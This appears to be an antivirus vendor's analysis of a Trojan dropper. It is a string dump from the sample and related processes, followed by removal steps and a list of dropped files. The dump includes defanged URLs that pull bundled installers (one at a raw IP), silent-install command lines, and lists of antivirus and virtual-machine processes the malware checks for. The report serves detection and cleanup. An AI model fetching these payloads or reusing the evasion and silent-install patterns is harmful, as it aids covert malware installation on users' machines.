.?AVProcessHandleImpl@Poco@@
.?AVPipeImpl@Poco@@
.?AVWindows1250Encoding@Poco@@
.?AVWindows1251Encoding@Poco@@
.?AVWindows1252Encoding@Poco@@
.?AVHTTPException@Net@Poco@@
.?AVHTTPRequest@Net@Poco@@
.?AVHTTPMessage@Net@Poco@@
.?AVHTTPResponse@Net@Poco@@
.?AVHTTPSession@Net@Poco@@
.?AVHTTPClientSession@Net@Poco@@
.?AVUnsupportedRedirectException@Net@Poco@@
.?AVFTPException@Net@Poco@@
.?AVSMTPException@Net@Poco@@
.?AVWebSocketException@Net@Poco@@
.?AVUnsupportedFamilyException@Net@Poco@@
.?AV?$BasicBufferedStreamBuf@DU?$char_traits@D@std@@VHTTPBufferAllocator@Net@Poco@@@Poco@@
.?AVHTTPHeaderStreamBuf@Net@Poco@@
.?AVHTTPHeaderIOS@Net@Poco@@
.?AVHTTPHeaderInputStream@Net@Poco@@
.?AVHTTPHeaderOutputStream@Net@Poco@@
.?AVHTTPStreamBuf@Net@Poco@@
.?AVHTTPIOS@Net@Poco@@
.?AVHTTPInputStream@Net@Poco@@
.?AVHTTPOutputStream@Net@Poco@@
.?AVHTTPFixedLengthStreamBuf@Net@Poco@@
.?AVHTTPFixedLengthIOS@Net@Poco@@
.?AVHTTPFixedLengthInputStream@Net@Poco@@
.?AVHTTPFixedLengthOutputStream@Net@Poco@@
.?AVHTTPChunkedStreamBuf@Net@Poco@@
.?AVHTTPChunkedIOS@Net@Poco@@
.?AVHTTPChunkedInputStream@Net@Poco@@
.?AVHTTPChunkedOutputStream@Net@Poco@@
.?AVSAXNotSupportedException@XML@Poco@@
.?AV?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@
.?AV?$VariableKeyLength@$0BA@$0BA@$0CA@$07$03$0A@@CryptoPP@@
.?AVSimpleKeyingInterface@CryptoPP@@
.PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@V12@@CryptoPP@@
.?AVHexEncoder@CryptoPP@@
.?AUNoChannelSupport@BufferedTransformation@CryptoPP@@
.?AVInvalidKeyLength@CryptoPP@@
.?AVCPzWebBrowser@@
c:\%original file name%.exe
16:36:36
2,467,144
hXXps://d.symcb.com/cps0%
hXXps://d.symcb.com/rpa0@
/hXXp://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
hXXp://ts-ocsp.ws.symantec.com0;
/hXXp://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
/1(0&0$0"
hXXps://d.symcb.com/rpa0.
hXXp://s.symcd.com06
%hXXp://s.symcb.com/universal-root.crl0
<VeriSign Class 3 Public Primary Certification Authority - G50
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
%f(<(
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
7-777}7
>(>2>>>[>
2(222>2[2
1 2'2.252
=#=&>3>^>
3?3T3
1%1x1
; <2<;<]<
; ;$;(;,;0;4;
: :$:(:,:0:4:8:
3 3$3(3,3
? ?$?(?,?0?4?8?
1$1(1,101
3 3$3*3.363
>$> >2>~>
2-43494[4
91979<9]9
4 4$4(4,4044484
7 7$7(7,707'8.8
? ?$?(?,?0?4?
7$9(9,9094989
= =$=(=,=0=4=8=
3,4044484<4
9094989<9@9
< <$<(<,<0<4<
2 2$2(2,20242
8$80888|8
7 7(707<7`7
3$3,383`3
8 8@8\8`8
: :$:,:@:\:`:|:
> >@>`>|>
? ?(?0?<?`?
0(000<0`0
ADVAPI32.DLL
.mscoree.dll
combase.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
hXXp://xiaobingdou.com/reportInstallaa.aspx
"%s" %s
hXXp://xiaobingdou.com/reportInstallaaFinish.aspx
hXXp://down2.uc.cn/pcbrowser/down.php?pid=4043
hXXp://down2.uc.cn/pcbrowser/down.php?pid=4722
32:HKEY_CURRENT_USER\Software\UCBrowserPID;64:HKEY_CURRENT_USER\Software\UCBrowserPID
hXXp://res.maoha.com/soft/mhwifi/MaoHaWiFiSetup_269.exe
hXXp://res.maoha.com/soft/mhwifi/MaoHaWiFiSetup_260.exe
hXXp://res.maoha.com/soft/mhwifi/MaoHaWiFiSetup_257.exe
hXXp://res.maoha.com/soft/mhwifi/MaoHaWiFiSetup_265.exe
32:HKEY_CURRENT_USER\Software\Maoha;64:HKEY_CURRENT_USER\Software\Maoha
hXXp://file2garage.pl/robots/webfriend.exe
"%s" /VERYSILENT /password=G@F@!-_F4bG_@S-?gF /subid=64bitPOPS3
32:HKEY_LOCAL_MACHINE\SOFTWARE\KHT;64:HKEY_LOCAL_MACHINE\SOFTWARE\KHT
hXXp://45.32.112.142/setup.3.15.exe
hXXp://VVV.maginotline.net/pub0512.exe
32:HKEY_LOCAL_MACHINE\SOFTWARE\FrivClubS;64:HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\FrivClubS
32:HKEY_LOCAL_MACHINE\SOFTWARE\Sakura:gamegogle;64:HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Sakura:gamegogle
32:HKEY_LOCAL_MACHINE\SOFTWARE\somefungames;64:HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\somefungames
32:HKEY_LOCAL_MACHINE\SOFTWARE\Jogotempo;64:HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Jogotempo
32:HKEY_LOCAL_MACHINE\SOFTWARE\SkypeUpdateEx;64:HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\SkypeUpdateEx
somefungames.com
hXXp://pop.yeaplayer.com/get.aspx
hXXp://VVV.somefungames.com/res/sg3.6.0.0.exe
hXXp://pop.yeaplayer.com/click.aspx
hXXp://xiaobingdou.com/anzhuang.aspx
hXXp://xiaobingdou.com/jihuo.aspx
QQ.exe
procexp.exe
taskmgr.exe
AvastUI.exe
d\
hXXp://1212.ip138.com/ic.asp
hXXp://VVV.ip-adress.com/
/iplookup/iplookup.php
hXXp://int.dpool.sina.com.cn
?h=X-X-X-X-X-X&r=%s_%s%s&a=%d&rt=%d --- adadsada
?h=X-X-X-X-X-X&r=%s_%s%s&a=%d --- adadsada
TEST%d
hXXp://int.dpool.sina.com.cn/iplookup/iplookup.php?ip=
hXXp://ip138.com/ips138.asp?ip=
hXXp://cdn3.optimizely.com/js/geo2.js
hXXp://software77.net/geo-ip/
config.yeadesktop.com
down.yeadesktop.com
Download failed:%d
cmd /C %s
ndddddd
Mddddd
VBoxTray.exe
VBoxService.exe
VMwareUser.exe
VMwareTray.exe
VMUpgradeHelper.exe
vmtoolsd.exe
vmacthlp.exe
Nekrn.exe
BaiduAn.exe
BaiduSd.exe
360sd.exe
360rp.exe
360Safe.exe
360tray.exe
avguard.exe
avp.exe
avgui.exe
BavSvc.exe
rstray.exe
SSScheduler.exe
ccSvcHst.exe
KVwsc.exe
FilMsg.exe
secenter.exe
coreServiceShell.exe
Portuguese(Brazilian)
Portuguese(Standard)
Portugal
Turkey
GOOGLE CHROME
WebOptimum
9996655
EXPLORER.EXE
setup.exe
"%s" /UPGRADE:"%s"
"%s" /UPGRADE:FINSIH
\StringFileInfo\x\%s
#{ad498944-762f-11d0-8dcb-00c04fc3358c}
s%s\%.4d-%.2d-%.2d %.2d.%.2d.%.2d.log
000000000000000
0000000
res://ieframe.dll/navcancl.htm#
iframe.htm
User-Agent:Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
User-Agent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
User-Agent:Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
User-Agent:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
User-Agent:Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11
User-Agent:Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
User-Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)
Kuaizip.lnk
MaohaWiFi.lnk
Chrome_WidgetWin_1
\Microsoft\Windows\Start Menu\Programs\
%s\%s
hXXp://dl.xvlhj.pw/8003/setup.exe
"%s" {8118C270CE041EA78C556FEF4C12EE48}
testcpu
hXXp://b3-31d2.kxcdn.com/B3.exe
rtestcpu_ok
testcpu_faild
"%s" /VERYSILENT /password=G@F@!-_F4bG_@S-?gF /subid=64bitPOPS

UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe_3920:




.text
`.rdata
@.data
.gfids
@.tls
.rsrc
@.reloc
j.Yf;
_tcPVj@
.PjRW
PSSSSSSh
atlthunk.dll
operator
operator ""
GetProcessWindowStation
%S#[k
\\.\PhysicalDrive%d
\\.\IDE21201.VXD
ERROR: Could not open IDE21201.VXD file
\\.\Scsi%d:
Drive%dModelNumber
Drive%dSerialNumber
DriveÜontrollerRevisionNumber
DriveÜontrollerBufferSize
Drive%dType
X-X-X-X-X-X
-- %s --
%%X
RegCreateKeyTransactedW
RegOpenKeyTransactedW
RegDeleteKeyTransactedW
D:\UCChannel\ucchannel\Release\ChannelU.pdb
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.CRT$XCA
.CRT$XCAA
.CRT$XCL
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XLA
.CRT$XLZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$T
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data
.data$r
.gfids$x
.gfids$y
.tls$
.tls$ZZZ
.rsrc$01
.rsrc$02
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHFileOperationW
ShellExecuteW
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
WININET.dll
PSAPI.DLL
IPHLPAPI.DLL
WINTRUST.dll
VERSION.dll
GetProcessHeap
GetCPInfo
.?AVCHttpDownload@@
ChannelDllUrl=hXXp://down2.uc.cn/pcbrowser/down.php?type=dll
version=6.1.2107.204
ReportUrl=hXXp://mmstat.ucweb.com/
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
4"4(4,424
5:5_5'656
5(565>5{5
8$8(8,808
2,2:2@2[2
8 8-838:8[8
0%0U0g0
=#=?=\=|=
8$8/84898]8
8%9s9
11C1R1a1p1
:,;0;4;8;
< <$<(<,<
= =$=(=,=0=4=8=<=
: :<:@:`:
kernel32.dll
mscoree.dll
msvcrt.dll
ext-ms-win-ntuser-windowstation-l1-1-0
portuguese-brazilian
aavc.ini
UCBrowser.exe
hXXp://wow.uc.cn/biz-data/sec/channel/test/config/av_config.ini
UCBrowserSetup.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
kxetray.exe
kxescore.exe
kislive.exe
kskinmgr.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
hXXp://mmstat.ucweb.com/
d\\.\%c:
\\.\PHYSICALDRIVE%d
bluesky.4.1.6.1.1
READ_URL_ERROR
READ_CHANNEL_BASE_URL_ERROR
PASS_PARAM_ERROR
EXTRACT_CHROMEPACKED7ZFILE_ERROR
UN7Z_TO_CHROME7Z_ERROR
UN7Z_TO_CHROMEBIN_ERROR
EXTRACT_TO_SETUPEXE_ERROR
UNCAB_TO_SETUPEXE_ERROR
RENAME_CHROME_FOLDER_ERROR
COPY_CHROME_FOLDER_ERROR
COPY_SETUPEXE_FILE_ERROR
RUN_SETUPEXE_FILE_ERROR
HTTP/1.1
Content-Length: %d
ChannelU.exe
ChannelDllUrl
PackageBaseUrl
ReportUrl
6.0.1121.13
config.ini
ChannelU.dll
hXXp://
\\.\X:
%d%d%d%d
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Advapi32.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26512\UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe
UCWeb Inc.
1.0.11.0
Copyright 2008-2016 UCWeb Inc. All rights reserved.

SearchProtocolHost.exe_3636:




.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

SearchFilterHost.exe_1904:




.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610

MaohaWifiSvr.exe_632:




.text
`.rdata
@.data
.rsrc
@.reloc
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
error RegOpenKeyEx
WifiRegWindowsRun
.\AutoStartProcessor.cpp
error RegOpenKeyEx CurrentUser
SubValue = %I64d. tickcount = %d
error open services has failed. tickcount = %d
error CAutoStartProcessor::BaseCreateProcessAsUser[%S]
CAutoStartProcessor::BaseCreateProcessAsUser[%S] OK
error LoadLibrary[%S]
.\CrashCatchInterface.cpp
error fCCInit[%d][%S]
.\driverloader.cpp
error SERVICE_RUNNING != ServiceStatus.dwCurrentState:%d
error fw.Add
.\init.cpp
.\main.cpp
MaohaWifiSvr.log
nCmdShow[%d] lpCmdLine[%S]
MaohaWifiSvr cmd %S
MaohaWifiSvr Uninstanll %s
.\MaohaFireWall.cpp
error QueryServiceStatus[%S]
error AddXP[%S][%S]
error AddWin7[%S][%S]
.\NotifyProcessor.cpp
error m_cs.SetName[%S]
ManualCheckUpdate bRet[%d]
error switch default m_pMapBuf->type[%d]
error BaseCreateProcessAsUser[%S]
BaseCreateProcessAsUser[%S] OK
bing.s.maohawifi.com
.\ProcessInfoCR.cpp
.\RepairSystemService.cpp
error firewall.StartSrv[SstpSvc]
error firewall.StartSrv[RasMan]
error firewall.StartSrv[MpsSvc] try again.
error firewall.StartSrv[MpsSvc]
error firewall.StartSrv[dot3svc]
error firewall.StartSrv[Wlansvc]
error firewall.StartSrv[DeviceInstall]
error firewall.StartSrv[WZCSVC]
error firewall.Add
error firewall.Add MaohaWifiSvr.exe
.\srvinst.cpp
from[%S]to[%S]
error MoveFileEx szIconCache[%S]
error MoveFileEx szFile[%S]
error SERVICE_RUNNING == ServiceStatus.dwCurrentState:%d
..\..\Common\dtl_base_common\base_critical.cpp
[%S]!
CBaseLog::LogInit
..\..\Common\dtl_base_common\base_log.cpp
[M---- -:-:-:%d][M][%s]---%s
ErrorCode = %d:%s
..\..\Common\dtl_base_common\base_proc.cpp
error fnGetFileVersionInfoSizeA %s
\StringFileInfo\xx\ProductVersion
error pVerValue:%s
..\wifiupdate\BaseFuncs.cpp
HUCmdBufApp
\adb\adb.exe
tips.exe
..\wifiupdate\DTLTips.cpp
Version[%d]
..\wifiupdate\SubmitProcessor.cpp
dispatch.s.maohawifi.com
UnionID[%d]
..\wifiupdate\SubStatInterface.cpp
STUDPProxy
error GetProcAddress m_fSTUDPProxy
STUDPTransfer
error GetProcAddress m_fSTUDPTransfer
STCmdApp
error GetProcAddress m_fSTCmdApp
error m_HUInterface.InitInterface
..\wifiupdate\UpdateProcessor.cpp
error m_HUInterface.AutoCheckUpdate
update.ss.maohawifi.com
\MaohawifiUpdate.dat
port
error MakeSureDirectoryPathExists %s
MaohaWifiSvr.exe
MaohaWiFiUpg.exe
update.xml
.\Repair\FireWall.cpp
error OpengService[%S]
relloc psevStatus memory %d
d:\svn\maohawifi\trunk\MaohaWiFi_New\WifiService\Release\MaohaWifiSvr.pdb
KERNEL32.dll
USER32.dll
GDI32.dll
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
WTSAPI32.dll
USERENV.dll
GdiplusShutdown
gdiplus.dll
VERSION.dll
dbghelp.dll
GetCPInfo
GetConsoleOutputCP
.?AVRegistryKey@@
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
3"333>3{3
4!424?4[4
8‚8&;8;
4$4)484_4
:&:4:9:|<
6 6$6(6,606
0$0(0,00040
KERNEL32.DLL
mscoree.dll
$"%s" -auto
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
services.exe
explorer.exe
.DEFAULT\Software\MAOHAWIFISTARTFLAG
\MaohaWiFi.exe
"%s" %s
K\MaohaWifiSvr.exe
e\MaohaCrashCatch.dll
\MaohaWiFi.dat
\MaoHaWiFiNet.sys
\MaoHaWiFiNet64.sys
\MaoHaCD.dll
lGlobal\MaohaWifiFileMapping{294DDACF-AA8A-4c4e-97C5-2D80D55933CD}
eGlobal\MaohaWifiNotifyEvent{F2AED1A3-E52A-4891-B749-867F5772733C}
Global\MaohaWifiNotifyReplyEvent{30BBB239-12E1-49d8-B0D8-82BCC7C9A517}
Global\MaohaWifiNotifyCritical{BF0FB343-47B7-4502-8DE5-3C64C103EDDB}
"%s" %s -runbysrv
\MaohaWifiCtrlDll.dll
\IconCache.db
\Microsoft\Windows\Explorer\
EXPLORER.EXE
s\Updater\CheckUpdate.dll
]\pcid.dll
pcid.dll
\maohasubstat.dll
tipsdll.dll
\ipnathlp.dll
Windows Firewall/Internet Connection Sharing (ICS)
%SystemRoot%\System32\svchost.exe -k netsvcs
@%SystemRoot%\System32\ipnathlp.dll,-106
@%SystemRoot%\System32\ipnathlp.dll,-107
%SystemRoot%\System32\ipnathlp.dll
%Program Files%\Maoha\MaohaAP\MaohaWifiSvr.exe
1, 0, 1, 10






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Scan a system with an anti-rootkit tool.
    2. 

  2. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    setup.3.15.exe:3396
    MaohaWifiSvr.exe:3768
    MaohaWifiSvr.exe:632
    MaoHaWiFiSetup_265.exe:3544
    %original file name%.exe:2624
    

    3. 

  3. Delete the original Trojan file.
    4. 

  4. Delete or disinfect the following files created/modified by the Trojan:
    

    %Program Files%\mgdisk\mgdisk.ssf (2866 bytes)
    %Program Files%\mgdisk\x64\cryptfd.sys (7424 bytes)
    %Program Files%\mgdisk\mgdinst.dll (17121 bytes)
    %Program Files%\mgdisk\uninst.exe (5573 bytes)
    %Program Files%\mgdisk\sqlite3.dll (17369 bytes)
    C:\Windows\System32\drivers\cryptfd.sys (6360 bytes)
    %Program Files%\mgdisk\sciter32.dll (94241 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn89D8.tmp\mgdinst.dll (34242 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn89D8.tmp\System.dll (23 bytes)
    C:\Users\Public\Documents\XMUpdate\conf.db (507 bytes)
    %Program Files%\mgdisk\mgdisk.exe (8126 bytes)
    %Program Files%\mgdisk\inst.db (7 bytes)
    C:\Users\Public\Desktop\magicdisk.lnk (937 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\mgdisk\uninstall magicdisk.lnk (955 bytes)
    %Program Files%\mgdisk\zlib.dll (925 bytes)
    %Program Files%\mgdisk\x86\cryptfd.sys (6784 bytes)
    %Program Files%\mgdisk\mgdisk.db3 (3 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\mgdisk\magicdisk.lnk (955 bytes)
    C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE (684 bytes)
    C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\ECF3006D44DA211141391220EE5049F4 (42 bytes)
    C:\Windows\Temp\CabDD63.tmp (48 bytes)
    C:\Windows\Temp\TarDD64.tmp (2712 bytes)
    C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\ECF3006D44DA211141391220EE5049F4 (412 bytes)
    C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE (1 bytes)
    %Program Files%\Maoha\MaohaAP\gzipdll.dll (306 bytes)
    %Program Files%\Maoha\MaohaAP\APDefault.ini (2 bytes)
    %Program Files%\Maoha\MaohaAP\WifiDhcpSvr.dll (214 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\MaohaWiFi.lnk (1 bytes)
    %Program Files%\Maoha\MaohaAP\driver\maohawifipronat64.cat (14 bytes)
    %Program Files%\Maoha\MaohaAP\welcome\img\app_tj.png (723 bytes)
    %Program Files%\Maoha\MaohaAP\ICSDHCP.ini (28 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (52 bytes)
    %Program Files%\Maoha\MaohaAP\Uninst.dar0 (1 bytes)
    %Program Files%\Maoha\MaohaAP\MaohaWifiWin7.dll (264 bytes)
    %Program Files%\Maoha\MaohaAP\welcome\img\logo.png (17 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab75CD.tmp (51 bytes)
    %Program Files%\Maoha\MaohaAP\driver\WifiProNat64.inf (3 bytes)
    %Program Files%\Maoha\MaohaAP\driver\MaohaWifiProNat64.sys (43 bytes)
    %Program Files%\Maoha\MaohaAP\driver\MaohaWifiProNat.sys (38 bytes)
    %Program Files%\Maoha\MaohaAP\MaohaDevMng.dll (195 bytes)
    %Program Files%\Maoha\MaohaAP\Reg\RasMan_XP.bat (24 bytes)
    %Program Files%\Maoha\MaohaAP\driver\DriverInstall_X64.exe (115 bytes)
    %Program Files%\Maoha\MaohaAP\RaWifi.dll (185 bytes)
    %Program Files%\Maoha\MaohaAP\Reg\RasMan_XP.reg (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab75BB.tmp (51 bytes)
    %Program Files%\Maoha\MaohaAP\driver\WifiProNat.inf (3 bytes)
